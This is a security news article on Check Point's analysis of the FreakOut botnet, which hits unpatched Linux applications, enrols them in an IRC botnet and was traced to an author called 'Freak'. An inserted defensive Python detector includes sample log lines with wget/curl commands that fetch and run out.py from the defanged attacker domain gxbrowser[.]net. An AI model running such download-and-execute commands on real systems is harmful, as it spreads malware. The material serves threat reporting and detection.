Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.
The botnet appeared in the threat landscape in November 2020; in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aim to compromise the target systems and enrol them in an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaigns.
The attacks observed by Check Point targeted devices running one of the following products:
Once a device is infected, it is later used as an attack platform.
Botnet operators scan the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities and take over the underlying Linux system:
“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
The bot is an obfuscated, polymorphic Python script downloaded from the site https://gxbrowser[.]net.
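The infection chain quoted above (download of out.py, chmod, execution with Python 2) gives defenders a concrete pattern to look for in process-execution telemetry. The following detector is an added example, not code from the article or from Check Point's report; the log lines and host names are constructed, and the download domain is kept in the page's defanged form.

```python
import re
from collections import defaultdict

# Constructed sample process-execution log lines ("<host> <command line>"), not real telemetry.
SAMPLE_LOG = """\
host1 wget -q http://gxbrowser[.]net/out.py -O /tmp/out.py
host1 chmod 777 /tmp/out.py
host1 python2 /tmp/out.py
host2 curl -s http://gxbrowser[.]net/out.py -o /tmp/out.py
host2 chmod +x /tmp/out.py
host3 python2 /opt/app/maintenance.py
host4 curl -s https://example.invalid/health
"""

# One regex per stage of the chain described in the write-up, matched against the command line.
STAGES = {
    "download": re.compile(r"\b(wget|curl)\b.*\bout\.py\b"),
    "chmod":    re.compile(r"\bchmod\b.*\bout\.py\b"),
    "execute":  re.compile(r"\bpython2?\b.*\bout\.py\b"),
}


def classify(cmdline):
    """Return the list of stage names whose pattern matches this command line."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]


def score_hosts(log_text):
    """Group matched stages per host and assign a verdict.

    'likely infected' requires all three stages on the same host; a download
    alone is 'attempted'; chmod or execution without a download is 'review'.
    Hosts with no matching lines (e.g. legitimate Python 2 use) are omitted.
    """
    seen = defaultdict(set)
    for line in log_text.splitlines():
        host, _, cmd = line.partition(" ")
        for stage in classify(cmd):
            seen[host].add(stage)
    verdicts = {}
    for host, stages in seen.items():
        if stages == set(STAGES):
            verdict = "likely infected"
        elif "download" in stages:
            verdict = "attempted"
        else:
            verdict = "review"
        verdicts[host] = {"stages": stages, "verdict": verdict}
    return verdicts
```

Running `score_hosts(SAMPLE_LOG)` flags host1 as likely infected and host2 as an attempt, while host3's unrelated Python 2 job is not reported.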
The FreakOut botnet has a modular structure; it uses a dedicated function for each capability it supports. Below is a list of the functions implemented in the botnet:
By combining the above functions, the botnet can conduct multiple malicious activities, such as delivering cryptocurrency miners, launching DDoS attacks, or spreading laterally across a company network.
Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.
The botnet is at an early stage: at the time of the analysis, the IRC panel showed it was controlling only 188 bots.
Check Point experts were also able to track its author, who goes online under the moniker Freak.
“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media. Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.
“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”
The analysis published by the experts includes the MITRE ATT&CK techniques and protections (IoCs, IPS, and Anti-Bot).
(SecurityAffairs – hacking, FreakOut botnet)